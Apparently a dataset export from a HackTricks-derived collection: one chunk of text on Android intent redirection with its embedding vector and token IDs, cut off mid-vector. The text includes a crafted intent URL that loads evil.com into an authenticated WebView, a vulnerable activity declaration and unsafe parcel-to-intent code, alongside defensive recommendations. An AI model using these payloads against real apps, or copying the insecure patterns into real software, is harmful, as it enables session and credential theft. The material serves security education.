text
stringlengths
5
3.08k
embedding
sequence
tokens
sequence
database
stringclasses
5 values
file
stringlengths
5
9
chunk
int64
0
192
url = http % 3a % 2f % 2fevil. com % 2f ; sel ; component = com. victim /. authwebviewactivity ; end " and bypass the app ’ s protection against explicit intents. we therefore recommend filtering the selector as wellintent. addcategory ( " android. intent. category. browsable " ) ; intent. setcomponent ( null ) ; intent. setselector ( null ) ; but even complete filtering does not guarantee complete protection, because an attacker can create an implicit intent corresponding to the intent - filter of some non - exported activity. example of an activity declaration : < activity android : name = ". authwebviewactivity " android : exported = " false " > < intent - filter > < action android : name = " android. intent. action. view " / > < category android : name = " android. intent. category. default " / > < data android : scheme = " victim " android : host = " secure _ handler " / > < / intent - filter > < / activity > webview. loadurl ( getintent ( ). getdata ( ). getqueryparameter ( " url " ), getauthheaders ( ) ) ; we therefore recommend checking that an activity is exported before it is launched. other ways of creating insecure intentssome app developers implement their own intent parsers ( often to handle deeplinks or push messages ), using e. g. json objects, strings or byte arrays, which either don't differ from the default or else present a great danger, because they may expand serializable and parcelable objects and they also allow insecure flags to be set. the security researcher may also encounter more exotic versions of intent creation, such as casting a byte array to a parcel and then reading an intent from ituri deeplinkuri = getintent ( ). getdata ( ) ; if ( deeplinkuri. tostring ( ). startswith ( " deeplink : / / handle / " ) ) { byte [ ] handle = base64. decode ( deeplinkuri. getqueryparameter ( " param " ), 0 ) ; parcel parcel = parcel. obtain ( ) ; parcel. unmarshall ( handle, 0, handle. length ) ; startactivity ( ( intent ) parcel. readparcelable ( getclassloader ( ) )
[ 0.04215553030371666, -0.20655962824821472, -0.5419530868530273, 0.48426544666290283, -0.10117635875940323, -0.07321131974458694, 0.48741525411605835, -0.06238382309675217, 0.13508576154708862, 0.8869913220405579, -0.06668008118867874, 0.042346082627773285, 0.42964693903923035, -0.04054989293217659, -1.341396450996399, -0.2654843032360077, -0.8561778664588928, 0.40246832370758057, -0.9821411967277527, 0.5117889642715454, 0.854148268699646, 0.632828414440155, -0.18688246607780457, -0.9070024490356445, -0.6586901545524597, 0.6773632764816284, 0.5991868376731873, -0.10488944500684738, 0.47545716166496277, 1.1084034442901611, 0.20501795411109924, -0.08555271476507187, 0.27833300828933716, -0.20573648810386658, -0.21255263686180115, -0.5571622252464294, 0.881280243396759, -0.4765683710575104, 0.3048040568828583, -0.3368968069553375, 0.5151986479759216, -0.17013809084892273, 0.0007496335310861468, -0.32501134276390076, -0.7797371745109558, -0.709770679473877, -0.6789630055427551, 0.14417481422424316, -0.014312502928078175, 0.13841290771961212, 0.36661332845687866, 0.5693781971931458, 0.3086232841014862, 0.24099457263946533, 0.13406121730804443, -0.29475054144859314, -0.37714943289756775, 0.13613606989383698, -0.2834150493144989, 0.17628219723701477, -0.5765989422798157, 0.44281232357025146, -0.20958469808101654, -0.6518771648406982, 0.34294044971466064, 0.7665588855743408, -0.09674207866191864, 0.09420186281204224, -0.062139201909303665, -0.4166421890258789, -0.5852330923080444, 0.5711509585380554, -0.951450526714325, -0.6662809252738953, -0.43432167172431946, -0.3836710751056671, -0.721332311630249, -0.40324318408966064, 0.3762980103492737, 0.4467962682247162, -0.30969226360321045, 0.25693991780281067, 0.098094642162323, -0.21106134355068207, -0.415679931640625, 0.11186125129461288, 0.09416420012712479, 0.579714298248291, -0.27089160680770874, 0.06850580871105194, 0.1770254373550415, 0.5864490866661072, -0.4533088803291321, -1.016912817955017, 0.25196242332458496, 0.7738282084465027, -0.255588561296463, 0.2473677098751068, 0.7022017240524292, -0.6454322338104248, 0.7382115721702576, 0.38343605399131775, -0.22555282711982727, 0.44849321246147156, -0.043536823242902756, 0.5225231647491455, 0.01352579053491354, 0.23902666568756104, -0.12729857861995697, -0.11125847697257996, 0.3557785451412201, -0.5086187720298767, -0.14774277806282043, -0.8951712846755981, -0.023009024560451508, 0.4719545543193817, 0.155158132314682, 0.7136693000793457, -0.5173025131225586, 0.519040584564209, -0.6130021810531616, -0.5778640508651733, 0.33941778540611267, 0.14141546189785004, 0.00078343425411731, -0.14663121104240417, 0.41355767846107483, 0.46218931674957275, -0.5216690897941589, 0.18854184448719025, -0.14381888508796692, -0.2339421957731247, 0.07379581779241562, 0.44046467542648315, -0.46715492010116577, 0.5596463680267334, 0.5599601864814758, 0.4023337960243225, 0.340279221534729, -0.8411567807197571, -0.4338986873626709, 0.18535110354423523, 0.4016209840774536, 0.8855485320091248, 0.44293710589408875, 0.27582091093063354, -0.4923136532306671, 0.36460423469543457, -0.1972360759973526, -0.04617438092827797, -0.05882029980421066, 0.33144596219062805, 0.8447033166885376, 0.010860269889235497, -0.40186867117881775, -0.045928407460451126, -0.28067925572395325, 0.2005392163991928, -0.3911723494529724, -0.04235426336526871, -0.304084450006485, 0.7518579959869385, 0.2074553519487381, 1.0052915811538696, -0.011182596907019615, 0.6117748618125916, -0.7598804235458374, -0.5221545696258545, -0.11740770190954208, 0.0936361625790596, 0.330495685338974, 0.2185758799314499, 0.116865374147892, 0.38478320837020874, 0.7815858721733093, 0.7482214570045471, -0.05227047577500343, -0.25969865918159485, 0.10983871668577194, 0.44596874713897705, -0.2513393461704254, -0.2864810824394226, -0.20231972634792328, 1.1567637920379639, -0.2519334852695465, -0.2157478779554367, 0.0627199187874794, -0.5574979186058044, -0.5189505219459534, -0.13956087827682495, 0.07265002280473709, 0.3098047077655792, -0.5272119045257568, 0.5023096799850464, 1.3166892528533936, -0.029784131795167923, -0.7604767680168152, 0.11943619698286057, 0.20784112811088562, -1.6011161804199219, -0.27953681349754333, 0.307756245136261, -0.14582306146621704, 1.1723843812942505, -0.4714542031288147, -0.6793874502182007, 0.4119158983230591, 0.7636082172393799, -0.38050588965415955, 0.5032032132148743, 0.5545285940170288, -0.32810941338539124, -0.23838165402412415, -0.31301090121269226, 0.08829740434885025, -0.5604814291000366, 0.13428781926631927, 0.4567955434322357, -0.06268727779388428, 0.4566637873649597, -0.48921582102775574, 0.28811565041542053, 0.6252947449684143, 0.10177116096019745, -0.0008834188338369131, 0.2353777140378952, -0.20532874763011932, 0.22330991923809052, -0.5502206683158875, 0.3257320821285248, -0.1551891565322876, 0.3140881657600403, 0.06132840737700462, 0.9589717984199524, -0.3284553587436676, -0.6248208284378052, 0.13592368364334106, 0.31755363941192627, 0.4939020872116089, 0.06352397054433823, 0.4669855237007141, 1.366782784461975, 0.4466671645641327, 0.6607890725135803, 0.0702650174498558, 0.13640250265598297, 0.25830554962158203, 0.11712560802698135, 0.0945163294672966, 0.09247028827667236, -0.03595782071352005, 0.6565040946006775, 0.6352936029434204, 0.243489608168602, -0.8571256399154663, -0.8814612627029419, 1.0848642587661743, 0.2876316010951996, -0.43085935711860657, -0.6202383637428284, 0.11284343153238297, -0.13682639598846436, -0.021375756710767746, -0.2104732096195221, -0.11007711291313171, 0.6147660613059998, -0.016890162602066994, 0.11204651743173599, -0.8209168910980225, -0.44925716519355774, -0.6444278955459595, -0.3677252531051636, -1.1928889751434326, -0.26940464973449707, -0.5734089612960815, -0.08714578300714493, -0.18643249571323395, -0.7032440900802612, 1.0613566637039185, -0.5823267102241516, -0.5271042585372925, 0.40991416573524475, -0.15749666094779968, 0.3207480013370514, -0.24688193202018738, 0.1962614357471466, -0.5041242241859436, 0.21634703874588013, 0.13307854533195496, 0.12847135961055756, -0.23995864391326904, -0.39803192019462585, -0.15693458914756775, 0.011309273540973663, 0.29265281558036804, -0.09185031056404114, 0.6735832691192627, 0.29190000891685486, -0.036135029047727585, 0.08725471794605255, 0.7325835824012756, -0.039653703570365906, 0.40906715393066406, 0.09349112212657928, -0.40655505657196045, 0.030885731801390648, 0.025771353393793106, -0.5700403451919556, 0.893666684627533, 0.2773761749267578, -0.6590600609779358, 0.07279343903064728, 0.19217213988304138, 0.6359068155288696, -0.7302772402763367, -0.3535310924053192, 0.4467167556285858, 0.31367337703704834, 0.45445892214775085, -0.25610649585723877, 0.05194631591439247, -0.20368541777133942, -0.21179892122745514, 0.26122212409973145, -0.22835664451122284, -0.3406388461589813, -0.0720914825797081, -0.7168605327606201, 0.6571991443634033, -0.2675328254699707, -0.6768868565559387, -0.5317443609237671, -0.558563232421875, 0.8529918789863586, -0.0037795808166265488, -0.03108978271484375, 0.07646144181489944, -0.23332169651985168, -0.16130049526691437, -0.3285147547721863, -0.07283848524093628, -0.4584271013736725, 0.5003654360771179, -0.1301691085100174, -0.26705309748649597, 0.857081949710846, 0.5355295538902283, -0.26987770199775696, 0.08358587324619293, -0.4175986051559448, -0.3455832302570343, 0.6850000619888306, -0.1679183542728424, -0.08401919156312943, 0.02638469636440277, 0.9323655962944031, -0.1784396767616272, -0.2625850439071655, 0.20480087399482727, 0.1311827152967453, 0.4961945712566376, -0.07388782501220703, 0.2579602003097534, 0.4576347768306732, -0.09049475193023682, -0.3808167278766632, 0.298842191696167, 0.4009491205215454, 0.6338896155357361, -0.05754098668694496, 0.22661755979061127, -0.36428216099739075, -0.4782050549983978, 0.28804102540016174, -0.8396361470222473, -0.7662225961685181, 1.2853845357894897, -0.08184550702571869, 0.6740305423736572, -0.8159630298614502, 0.14125670492649078, 0.06754672527313232, 0.23706239461898804, 0.5372462868690491, 0.21791042387485504, -0.5101824402809143, -0.694848358631134, -0.09433674812316895, 0.1107420027256012, 0.1030350998044014, -0.08761455118656158, -0.20758570730686188, 0.2928606867790222, -0.5003054141998291, -0.8351677060127258, -0.5885282754898071, 0.42524808645248413, 0.3785931468009949, 0.8092871308326721, 0.5081155896186829, 0.8206366300582886, 0.5505648851394653, 0.2733200788497925, 0.28660324215888977, -0.41577810049057007, 0.1172785758972168, -0.19580426812171936, 0.6945472359657288, -0.5071774125099182, -0.2884569466114044, -0.37938278913497925, 0.16198979318141937, -0.5931011438369751, -0.34048357605934143, 0.34807947278022766, 0.07227002829313278, -1.0265084505081177, -0.4311307966709137, 0.1332562118768692, 0.21194414794445038, -0.4856838583946228, -0.1253173053264618, -0.31468287110328674, 0.7193813920021057, 0.4248410761356354, -0.30078235268592834, -0.17006424069404602, -0.9033551216125488, 0.04926242679357529, 0.3216739594936371, -0.051502522081136703, -0.3464904725551605, -0.6656814813613892, -0.9639007449150085, -0.8329508900642395, -0.2203671634197235, 0.1522635519504547, -0.45565125346183777, -0.008395637385547161, -0.4218115210533142, 0.05973079428076744, 0.9130578637123108, -0.5290824770927429, -0.7150629758834839, -0.4340091943740845, 0.4992234706878662, 0.08478090912103653, 0.972144365310669, -0.21663564443588257, -0.1056629940867424, 0.4457641839981079, -0.39439311623573303, 0.7453994750976562, -1.1708629131317139, -0.39249342679977417, 0.2525849938392639, 0.6521751880645752, 0.0009129000245593488, 0.13709679245948792, -0.6769284009933472, 0.11768605560064316, -0.30650046467781067, 0.25833573937416077, -0.6513753533363342, -0.34297242760658264, 0.4992440938949585, -0.1994210034608841, 0.30021458864212036, 0.1571531593799591, -0.021616369485855103, -0.17278769612312317, 0.20302999019622803, -0.2468225657939911, -0.6526831388473511, 0.8056150674819946, 0.041441917419433594, 0.5887852311134338, 0.3908913731575012, -0.5205815434455872, -0.32480350136756897, -0.7457732558250427, 0.4948621094226837, 0.5441582202911377, -0.317898690700531, -0.8842905759811401, -0.38666290044784546, 0.5943273305892944, -0.23111028969287872, -0.12353846430778503, 0.6536921858787537, 0.22796572744846344, 0.10798502713441849, 0.2736080586910248, 0.3560236096382141, -0.6002517342567444, -0.6511645317077637, -0.5647227168083191, -0.715370774269104, 0.25872817635536194, -0.06568337976932526, 1.2359603643417358, -0.16056938469409943, -0.27555885910987854, 0.514855682849884, 0.40169429779052734, -0.0722423642873764, -0.6478466987609863, -0.6629040837287903, -0.38376134634017944, 0.076423779129982, 0.1311730593442917, 0.7009992599487305, -0.8195767998695374, 0.03411131352186203, 1.2087924480438232, 0.3657423257827759, 0.5943814516067505, -0.42330995202064514, -0.7446237206459045, 0.320835143327713, 0.25497502088546753, -0.5197842121124268, 0.08355849236249924, 0.37624603509902954, -0.1421164572238922, 0.06947658210992813, -0.09313100576400757, -0.9207451939582825, -1.175026774406433, -0.545518159866333, 0.40292882919311523, -0.8385531902313232, 0.2931027114391327, -0.8565806150436401, -0.6307675838470459, -0.221655011177063, 0.8674978613853455, -0.05053804814815521, -0.28662553429603577, -0.3312368094921112, -0.048426877707242966, 0.11712721735239029, -0.025492742657661438, -0.2961271107196808, -0.44623443484306335, -0.7007707357406616, 0.0008136117248795927, 0.4779505729675293, 0.8373939990997314, -0.3695739507675171, -0.1757640242576599, -0.09865295886993408, 0.3522789478302002, 0.0031013712286949158, -0.3861507773399353, -0.15401780605316162, -0.45250147581100464, 0.36118900775909424, -0.516744077205658, 0.7580506205558777, -0.9709708094596863, 0.5190793871879578, 0.13934527337551117, 0.6624730825424194, -0.23392176628112793, -0.07985388487577438, 0.24125359952449799, 0.4811042249202728, 0.33069634437561035, -0.5885409116744995, -0.19067980349063873, 0.03679462522268295, 0.7540826797485352, -0.3449145257472992, 0.009784725494682789, -0.6154731512069702, 0.16477371752262115, -0.7892481684684753, -1.1563489437103271, 0.38864824175834656, 0.04850172996520996, 0.3231421709060669, -0.29243844747543335, -0.24321089684963226, 0.44379544258117676, -0.22551384568214417, -0.04799089580774307, 0.9695708155632019, 0.10488498955965042, -0.29351693391799927, -0.3489208221435547, -0.030004065483808517, 0.32973501086235046, -0.12814776599407196, 0.01858091913163662, 0.00710487924516201, -0.48626503348350525, 0.01704283058643341, -0.4643476903438568, -0.2336888462305069, -0.37878838181495667, -0.1298801451921463, 0.1712660789489746, -0.5606014132499695, 0.5771471858024597, -0.6798824071884155, -0.6420654654502869, -0.48889821767807007, 0.17682930827140808, -0.10465604811906815, 0.3440081775188446, 0.623793363571167, 0.6589592695236206, 0.4194487929344177, -0.1356150358915329, 0.5679691433906555, 0.4243220090866089, -0.23127470910549164, 0.9916208982467651, 0.07727005332708359, -0.5650103092193604, 0.34811529517173767, 0.4538058936595917, -0.7357520461082458, -0.15319980680942535, -0.04412655532360077, -0.3349562883377075, 0.37429410219192505, 0.2959216833114624, -0.3206292688846588, 0.5165194272994995, -0.08056865632534027, -0.011280878446996212, 0.5664403438568115, 0.6774451732635498, 0.12242688238620758, -0.5422147512435913, 0.8341331481933594, -0.0857076346874237, -0.022589948028326035, 0.7183926105499268, -0.0444839708507061, -0.3744552433490753, -0.26531022787094116, 0.38277456164360046, 0.3923063278198242, 0.22939224541187286, 1.4474674463272095, 0.34099653363227844, 0.6791113018989563, 0.25022032856941223, -0.15856070816516876, 0.5807088017463684, -0.4320385754108429, -0.0111670708283782, 1.0822815895080566, 0.07730836421251297, -0.9156156182289124, -0.10187087953090668, 0.16363844275474548, 0.12201003730297089, -0.20436914265155792, -0.6979608535766602, 0.08069421350955963, -0.35373353958129883, -0.1394556611776352, -0.18360894918441772, -0.5508019328117371, -0.655099630355835, -0.6091310381889343, 0.13281652331352234, -0.49436160922050476, -0.41106340289115906, -0.023768585175275803, 0.8262737989425659, -0.2672169804573059, -0.4428195059299469, -0.3513146936893463, 0.23144452273845673, 0.27925610542297363, -0.4866567552089691, -0.7971203923225403, 0.30418965220451355, -0.6650253534317017, -1.0863336324691772, -0.3943878412246704, -0.30451035499572754, -0.04250940680503845, -0.7143219709396362, -0.35506799817085266, 0.015763036906719208, -0.5998265147209167, 0.09849075227975845, -0.5740464329719543, 0.07840176671743393, -0.3423815667629242, -0.6799106597900391, 0.06513340771198273, 0.8272090554237366, -0.3897496163845062, 0.050062548369169235, 0.6267125010490417, 0.19247031211853027, -0.19708842039108276, -0.557630181312561, -0.01598987728357315, -0.4896259307861328, -0.08316035568714142, 0.20450328290462494, 0.2048344761133194, -0.3435370922088623, 0.3590889275074005, -0.06537797302007675, -0.12146515399217606, -0.24973873794078827, -0.6514443159103394, -0.23025643825531006, 0.38604575395584106, -0.7742413878440857, -0.29536205530166626, 0.34940406680107117, 0.36219143867492676, 0.453772634267807, -0.4529820382595062, 0.5221737027168274, 0.30012476444244385, 0.12201084196567535, 0.4125506579875946, 0.08572719246149063, 0.03883500024676323, 0.14342118799686432, -0.005623441189527512, 0.23321658372879028, -0.28070253133773804, 0.6648638248443604, 0.132284015417099, -0.014704140834510326, -0.4928269684314728, 0.2870650887489319, 0.18044309318065643, 0.5232449173927307, 0.2581746578216553, 0.260115385055542, 0.28406640887260437, 0.001657700166106224, -0.6075069308280945, 0.2854134440422058, -0.7043408751487732, -0.33040308952331543, 0.5484299659729004, -0.3806430995464325, -0.8284369111061096, -0.6879292130470276, 0.2685714364051819, -0.3127034604549408, 0.09406042844057083, -0.4331577718257904, 0.6155603528022766, 0.5036339163780212, 0.13042768836021423, 1.1648101806640625, -0.5530998110771179, 0.24061544239521027, 0.1383921355009079, 0.26832783222198486, -0.7367193698883057, -1.2799100875854492, 0.5326620936393738, 0.9804148077964783, 0.04291851818561554, -0.1350037157535553, -0.7151944041252136, -0.10218602418899536, 0.3399756848812103, -0.3870580494403839, 0.23762407898902893, 0.532372772693634, -1.105698823928833, 0.6441295742988586, 0.056808169931173325, 0.06133872643113136, 0.3802396059036255, -0.17625609040260315, -0.027113482356071472, -0.23697331547737122, -0.34529435634613037, 0.0015511253150179982, -0.1459311842918396, 0.07941076904535294, 0.7497512698173523, 0.29610466957092285, 0.9750669002532959, -0.2869715690612793, -0.26217857003211975, 0.2502983510494232, 0.8924769759178162, 0.7791267037391663, -0.32055965065956116, 0.012441132217645645, 0.027319755405187607, 0.6551598310470581, -0.4036416709423065, 0.022148100659251213, 0.7653774619102478, -0.3475250005722046, -0.41070839762687683, 0.1260491907596588, -0.06334296613931656, 0.27433356642723083, -0.36116594076156616, -0.3053698241710663, -0.2731983959674835, -0.18444843590259552, 0.09223269671201706, 0.3525662124156952, -0.3437592387199402, 0.5379551649093628, -0.27284762263298035, 0.7536144852638245, -0.6942734122276306, -0.04526219144463539, 0.6355147957801819, 0.41551926732063293, -1.115625262260437, 0.3667268753051758, 1.4764349460601807, 0.00004462422657525167, -0.35147714614868164, 0.7730912566184998, -0.49332404136657715, 0.19057755172252655, 0.16697929799556732, -0.15146319568157196, -0.31379619240760803, -0.052434079349040985, 0.38403987884521484, -0.14197878539562225, -0.4588806629180908, 0.19418537616729736, 0.03412934020161629, 0.0809820294380188, 0.7323389649391174, -0.37361517548561096, 0.21991676092147827, -0.11654721945524216, 0.30218011140823364, -0.5483149886131287, -0.766459584236145, 0.5841864347457886, -0.40080738067626953, -0.4924403131008148, 0.24535386264324188, -0.09144527465105057, 0.6077650785446167, -0.17424564063549042, 0.7075495719909668, -0.25331488251686096, 0.12020328640937805, 0.003887603525072336, -0.18360935151576996, -0.3613053858280182, -0.331748366355896, -0.1464242935180664, -0.3591781258583069, 0.223789781332016, -0.1822599470615387, 0.3086968958377838, 0.21433129906654358, -0.7351828813552856, -0.3500831723213196, -0.1453828513622284, -0.08824358135461807, -0.4872635006904602, 0.8166590332984924, 0.2757026255130768, -0.4881981313228607, -0.3780054748058319, -0.020431967452168465, -0.21183916926383972, 0.3720356523990631, -0.5524231195449829, -0.40197721123695374, -0.6669923067092896, -0.38353243470191956, -0.6807053089141846, 0.9750352501869202, -0.3849635124206543, -0.45880046486854553, 0.41490837931632996, -1.2174370288848877, -0.793593168258667, -0.23337580263614655, -0.5028523206710815, -0.4440270960330963, 0.5756539702415466, 0.6670376062393188, 0.28989890217781067, 0.6335965991020203, -0.38094523549079895, -0.5026264190673828, 0.35444802045822144, 0.7553089261054993, -0.5493981242179871, 0.7455593943595886, -0.24807214736938477, -0.011957806535065174, 0.6617109179496765, 0.22191230952739716, 0.7640987634658813, -0.15415985882282257, -0.46457692980766296, -0.158344104886055, -0.24415746331214905, -0.7755478024482727, -0.000624054460786283, 0.7040501832962036, 0.21961016952991486, 0.21727359294891357, -0.6409088373184204, -0.7742561101913452, -0.10297121852636337, -0.7645062208175659, 0.44977402687072754, 0.15364128351211548, -0.5539541840553284, 0.48141664266586304, -0.0876065120100975, 1.0269148349761963, -1.0718963146209717, 4.427646636962891, 0.3028549253940582, -0.04243665561079979, 0.35299447178840637, 0.06800512969493866, 0.5033087730407715, 1.1021628379821777, -1.0194294452667236, 0.28789404034614563, -0.03955156356096268, 0.3767140507698059, -0.04707101359963417, 0.48426029086112976, 0.20286019146442413, 0.136178657412529, 0.43793362379074097, -0.6913580298423767, 0.22437642514705658, 0.22878360748291016, -1.0749033689498901, -1.1001882553100586, 0.8098963499069214, -0.3322843015193939, 0.8701373338699341, 0.23549503087997437, 0.5222471356391907, 0.033608682453632355, -0.31431934237480164, -0.39981701970100403, -0.2187562733888626, 0.3540152609348297, -0.4066620171070099, 0.1083584800362587, -0.6128320693969727, -0.5754559636116028, -0.12972795963287354, -0.0898972749710083, -0.7478488683700562, -0.5925164818763733, -0.12478728592395782, 0.17381598055362701, -0.02834375761449337, -0.22719725966453552, -0.29668742418289185, 0.6429129838943481, 0.5703101754188538, -0.6476900577545166, 0.3577204942703247, 0.859826385974884, -0.954850435256958, 0.5411361455917358, -0.057728610932826996, 0.6835676431655884, 0.0033231789711862803, -0.4276100695133209, -0.2786480784416199, 0.6796445846557617, -0.19511224329471588, 0.30665066838264465, 0.21650303900241852, -0.2913886308670044, -0.3953423500061035, 0.1944379210472107, -0.23504823446273804, -0.6630884408950806, -0.23237952589988708, -0.5527075529098511, 0.7857367992401123, 0.3719695210456848, 0.12375117838382721, -0.665113091468811, -0.6593142151832581, -0.08419128507375717, -0.2566530406475067, 0.4307847023010254, 0.010570714250206947, 0.1926620453596115, 0.5981556177139282, 0.26388442516326904, -0.18336351215839386, -0.3537364602088928, -0.544224202632904, -0.8606907725334167, 0.2168324887752533, 0.8673142790794373, 0.6706215143203735, 0.00479132542386651, -0.4227440059185028, -0.030347831547260284, 0.0010845367796719074, 0.32674577832221985, -0.44818997383117676, -0.32807108759880066, -0.5827943086624146, 0.4463636577129364 ]
[ 24471, 2140, 1027, 8299, 1003, 23842, 1003, 1016, 2546, 1003, 1016, 7959, 14762, 1012, 4012, 1003, 1016, 2546, 1025, 7367, 2140, 1025, 6922, 1027, 4012, 1012, 6778, 1013, 1012, 8740, 2705, 8545, 2497, 8584, 18908, 7730, 1025, 2203, 1000, 1998, 11826, 1996, 10439, 1521, 1055, 3860, 2114, 13216, 7848, 2015, 1012, 2057, 3568, 16755, 22910, 1996, 27000, 2004, 2092, 18447, 4765, 1012, 5587, 16280, 20255, 2100, 1006, 1000, 11924, 1012, 7848, 1012, 4696, 1012, 11347, 3085, 1000, 1007, 1025, 7848, 1012, 2275, 9006, 29513, 3372, 1006, 19701, 1007, 1025, 7848, 1012, 4520, 12260, 16761, 1006, 19701, 1007, 1025, 2021, 2130, 3143, 22910, 2515, 2025, 11302, 3143, 3860, 1010, 2138, 2019, 17346, 2064, 3443, 2019, 24655, 7848, 7978, 2000, 1996, 7848, 1011, 11307, 1997, 2070, 2512, 1011, 15612, 4023, 1012, 2742, 1997, 2019, 4023, 8170, 1024, 1026, 4023, 11924, 1024, 2171, 1027, 1000, 1012, 8740, 2705, 8545, 2497, 8584, 18908, 7730, 1000, 11924, 1024, 15612, 1027, 1000, 6270, 1000, 1028, 1026, 7848, 1011, 11307, 1028, 1026, 2895, 11924, 1024, 2171, 1027, 1000, 11924, 1012, 7848, 1012, 2895, 1012, 3193, 1000, 1013, 1028, 1026, 4696, 11924, 1024, 2171, 1027, 1000, 11924, 1012, 7848, 1012, 4696, 1012, 12398, 1000, 1013, 1028, 1026, 2951, 11924, 1024, 5679, 1027, 1000, 6778, 1000, 11924, 1024, 3677, 1027, 1000, 5851, 1035, 28213, 1000, 1013, 1028, 1026, 1013, 7848, 1011, 11307, 1028, 1026, 1013, 4023, 1028, 4773, 8584, 1012, 7170, 3126, 2140, 1006, 2131, 18447, 4765, 1006, 1007, 1012, 2131, 2850, 2696, 1006, 1007, 1012, 2131, 4226, 2854, 28689, 22828, 1006, 1000, 24471, 2140, 1000, 1007, 1010, 2131, 4887, 2705, 4974, 2545, 1006, 1007, 1007, 1025, 2057, 3568, 16755, 9361, 2008, 2019, 4023, 2003, 15612, 2077, 2009, 2003, 3390, 1012, 2060, 3971, 1997, 4526, 16021, 29150, 7848, 24137, 4168, 10439, 9797, 10408, 2037, 2219, 7848, 11968, 8043, 2015, 1006, 2411, 2000, 5047, 2784, 13767, 2015, 2030, 5245, 7696, 1007, 1010, 2478, 1041, 1012, 1043, 1012, 1046, 3385, 5200, 1010, 7817, 2030, 24880, 27448, 1010, 2029, 2593, 2079, 2025, 11234, 2013, 1996, 12398, 2030, 2842, 2556, 1037, 2307, 5473, 1010, 2138, 2027, 2089, 7818, 7642, 21335, 3468, 1998, 20463, 3085, 5200, 1998, 2027, 2036, 3499, 16021, 29150, 9245, 2000, 2022, 2275, 1012, 1996, 3036, 10753, 2089, 2036, 8087, 2062, 12564, 4617, 1997, 7848, 4325, 1010, 2107, 2004, 9179, 1037, 24880, 9140, 2000, 1037, 20463, 1998, 2059, 3752, 2019, 7848, 2013, 2009, 9496, 2784, 13767, 9496, 1027, 2131, 18447, 4765, 1006, 1007, 1012, 2131, 2850, 2696, 1006, 1007, 1025, 2065, 1006, 2784, 13767, 9496, 1012, 2000, 3367, 4892, 1006, 1007, 1012, 4627, 24415, 1006, 1000, 2784, 13767, 1024, 1013, 1013, 5047, 1013, 1000, 1007, 1007, 1063, 24880, 1031, 1033, 5047, 1027, 2918, 21084, 1012, 21933, 3207, 1006, 2784, 13767, 9496, 1012, 2131, 4226, 2854, 28689, 22828, 1006, 1000, 11498, 2213, 1000, 1007, 1010, 1014, 1007, 1025, 20463, 20463, 1027, 20463, 1012, 6855, 1006, 1007, 1025, 20463, 1012, 4895, 7849, 7377, 3363, 1006, 5047, 1010, 1014, 1010, 5047, 1012, 3091, 1007, 1025, 2707, 18908, 7730, 1006, 1006, 7848, 1007, 20463, 1012, 3191, 19362, 29109, 3085, 1006, 2131, 26266, 11066, 2121, 1006, 1007, 1007 ]
hack_tricks
419.txt
6
) ; } vuln appgithub - oversecured / ovaa : oversecured vulnerable android appgithub [SEP]
[ 0.3509221076965332, -0.04562186822295189, -0.42863452434539795, 1.0869736671447754, -0.7757604718208313, -1.1556566953659058, 0.9063653945922852, 0.24661807715892792, 0.4816478490829468, 0.8302637934684753, -0.03516559675335884, 0.3176509439945221, 0.9291524291038513, -0.3487511873245239, -0.953392505645752, 0.49730005860328674, -0.23950733244419098, 0.21510595083236694, 0.030577342957258224, 0.3684043288230896, 0.6890891790390015, 0.29320332407951355, -1.29176926612854, -0.18905675411224365, -0.005067261401563883, 0.9121176600456238, 0.662885308265686, 0.26099804043769836, 0.920393705368042, 0.8427714705467224, 0.1278366893529892, 0.23723532259464264, 0.306934654712677, -0.5367087721824646, -0.026557285338640213, -0.6867654323577881, 0.866929829120636, 0.2974756956100464, -0.5523422360420227, -1.506834626197815, 0.48923686146736145, -0.2896392345428467, 0.23708456754684448, -0.2762829661369324, -1.0182316303253174, -0.4399583637714386, -0.497444212436676, -0.20960558950901031, -0.4001614451408386, -0.09202998876571655, -0.3640684187412262, 0.35495707392692566, 0.6332183480262756, 0.42960721254348755, -0.32902291417121887, -0.07326958328485489, -0.09367137402296066, -0.22321198880672455, -0.8558709621429443, -0.18468503654003143, 0.7206942439079285, 0.7140818238258362, -0.20018905401229858, -1.1254171133041382, 0.042956892400979996, 0.8291229605674744, -0.44535383582115173, -0.24337804317474365, -0.37855619192123413, -0.6078228950500488, -0.5307185053825378, 1.2582353353500366, -0.3963390588760376, -1.2631735801696777, -0.7401981353759766, 0.02763517200946808, -0.2681225538253784, -0.0627017393708229, 0.008021279238164425, 0.7581707239151001, -0.22840209305286407, 0.733211874961853, 0.32993218302726746, -0.448379248380661, -0.8878692388534546, 0.17388442158699036, 0.768424928188324, -0.009909035637974739, -0.025037407875061035, 0.3589854836463928, -0.2139315903186798, 0.4322929084300995, -0.24488143622875214, 0.05794680491089821, -0.20306751132011414, 1.289638876914978, -0.4033708870410919, 0.18176983296871185, 0.41014379262924194, 0.3389647901058197, 0.3703906536102295, -0.08160153031349182, 0.014239797368645668, 0.7240118384361267, -0.06993582099676132, 0.6187118887901306, 0.5346473455429077, 0.33275875449180603, 0.19802731275558472, -0.49894407391548157, 0.2227117121219635, -0.09841997921466827, -0.6550763845443726, -0.5080692172050476, 0.05551355332136154, -0.08138073235750198, -0.8106977939605713, 0.6843773126602173, -0.8924241662025452, -0.9168069958686829, 0.3133498728275299, 0.23632709681987762, 0.6630595922470093, -0.3260733485221863, 0.23840102553367615, -0.3899324834346771, 0.37946370244026184, 1.2372864484786987, -0.18884727358818054, -0.063437819480896, 0.2236204743385315, 0.09254246205091476, 0.6703375577926636, 1.036621332168579, -0.48465967178344727, -0.2823126018047333, -0.17780305445194244, 0.6136357188224792, 0.802437424659729, -1.0821858644485474, -0.6414047479629517, -0.22699570655822754, 0.18485915660858154, 1.6441848278045654, -1.7445826530456543, 0.5472537279129028, 0.9120141267776489, -0.3071267604827881, -0.5842154026031494, 0.6894204020500183, 0.1890152096748352, 0.17883233726024628, 0.4241938292980194, 0.22150835394859314, -0.1668419986963272, 0.633727490901947, -0.022460363805294037, 0.8465045094490051, 0.707364022731781, -0.2934856116771698, -0.23017136752605438, 0.4942985475063324, 0.19886688888072968, 0.7813584208488464, 0.08201952278614044, 1.7166332006454468, -0.4932636618614197, -0.7099368572235107, -0.29754212498664856, 0.5217053890228271, 0.35104143619537354, 0.34051084518432617, -0.3429071009159088, 0.12920352816581726, 0.9342441558837891, 0.6488745212554932, 0.33426591753959656, -0.17264798283576965, 0.8880624175071716, 1.0347318649291992, 0.034418947994709015, 0.1759667694568634, -0.04911024495959282, 1.36754310131073, -0.04967828467488289, 0.250102698802948, 0.02234090305864811, -0.36852991580963135, -0.23428165912628174, -0.30292779207229614, -0.1221628487110138, 0.04185986891388893, 